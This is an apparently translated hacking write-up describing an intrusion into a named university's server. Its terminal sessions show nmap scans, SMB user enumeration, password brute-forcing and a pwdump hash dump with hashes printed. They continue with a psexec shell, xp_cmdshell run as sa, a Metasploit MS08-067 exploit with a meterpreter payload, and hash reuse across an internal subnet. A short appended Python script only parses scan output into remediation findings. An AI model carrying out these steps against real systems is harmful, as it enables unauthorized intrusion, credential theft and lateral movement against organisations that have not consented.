nmap+msf intrusion of Guangxi Normal University
Guangxi Normal University website: http://202.103.242.241/

root@bt:~# nmap -sS -sV 202.103.242.241
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc         Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
MAC Address: 08:00:27:D7:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb   // list the scanning scripts
-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
// this uses the script to enumerate the account names present on the remote machine
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27:D7:2E:79 (Cadmus Computer Systems)
Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser   // scan result
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
// view the shares
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27:D7:2E:79 (Cadmus Computer Systems)
Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241
// obtain user passwords
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27:D7:2E:79 (Cadmus Computer Systems)
Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful
Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
root@bt:~# wget http://swamp.foofus.net/fizzgig/pwdump/pwdump6-1.7.2-exe-only.tar.bz2   // grab the hashes
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
MAC Address: 08:00:27:D7:2E:79 (Cadmus Computer Systems)
Host script results:
| smb-pwdump:
|   Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
|   Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
|   test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_  TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe   // get a cmd shell
PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000
(C) 版权所有 1985-2000 Microsoft Corp.
C:\WINNT\system32>ipconfig
Windows 2000 IP Configuration
Ethernet adapter 本地连接:
Connection-specific DNS Suffix. :
IP Address. . . . . . . . . . . . : 202.103.242.241
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 202.103.1.1
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user'"   // log in remotely as sa and execute a command

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241   // check the target machine for vulnerabilities
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27:D7:2E:79 (Cadmus Computer Systems)
Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
root@bt:~# msfconsole   // use msf to exploit the MS08-067 vulnerability and overflow the target machine
msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf exploit(ms08_067_netapi) > show payloads
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > exploit
meterpreter >
Background session 2? (ctrl+z)
msf exploit(ms08_067_netapi) > sessions -l
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator
root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
// use the usernames and the obtained hash to try logging in across the whole internal subnet
Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27:D7:2E:79 (Cadmus Computer Systems)
Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful
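As an added example (not part of the original write-up), a small Python triage script for the defender's side: it parses the smb-* host-script output that the scans above printed into prioritised remediation findings (the unpatched MS08-067, the blank and guessable passwords, the anonymous READ on IPC$, the anonymously enumerable accounts). The sample report is constructed from the output above, and the severity labels are my own assumption.

```python
import re

# Constructed sample: the smb-* host-script output printed by the scans above,
# joined into one nmap normal-format report (sample input, not a live scan).
SAMPLE = """Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser
| smb-enum-shares:
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful
| smb-check-vulns:
|_  MS08-067: VULNERABLE
"""

def parse_host_scripts(report):
    """Group the '|'-prefixed NSE output lines under the script that printed them."""
    scripts, current = {}, None
    for m in re.finditer(r"^\|_?[ \t]*(.*)$", report, re.M):  # ignores port table, banners
        name = re.match(r"^(smb[\w-]*):\s*$", m.group(1))
        if name:
            current = name.group(1)
            scripts[current] = []
        elif current:
            scripts[current].append(m.group(1).strip())
    return scripts

def findings(report):
    """Map the parsed script output to remediation findings, worst first (severities are assumed labels)."""
    s, out = parse_host_scripts(report), []
    for vuln in s.get("smb-check-vulns", []):            # "MS08-067: VULNERABLE"
        if vuln.endswith("VULNERABLE"):
            out.append(("critical", "unpatched " + vuln.split(":")[0]))
    for cred in s.get("smb-brute", []):                  # "user:pass => Login was successful"
        user, pw = cred.split(" =>")[0].split(":", 1)
        out.append(("critical" if pw == "<blank>" else "high", "guessable password for " + user))
    share = None
    for item in s.get("smb-enum-shares", []):            # share name, then its access line
        if not item.startswith("Anonymous access:"):
            share = item
        elif not item.endswith("<none>"):
            out.append(("high", "anonymous %s on %s" % (item.split(": ")[1], share)))
    for users in s.get("smb-enum-users", []):            # "Domain: X; Users: a, b, c"
        out.append(("medium", "accounts enumerable anonymously: " + users.split("Users: ")[1]))
    return sorted(out, key=lambda f: ("critical", "high", "medium").index(f[0]))
```

Feed it the real `nmap -oN` file instead of SAMPLE to get the same list for a scan of your own hosts.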
Attack succeeded: a simple msf+nmap attack~~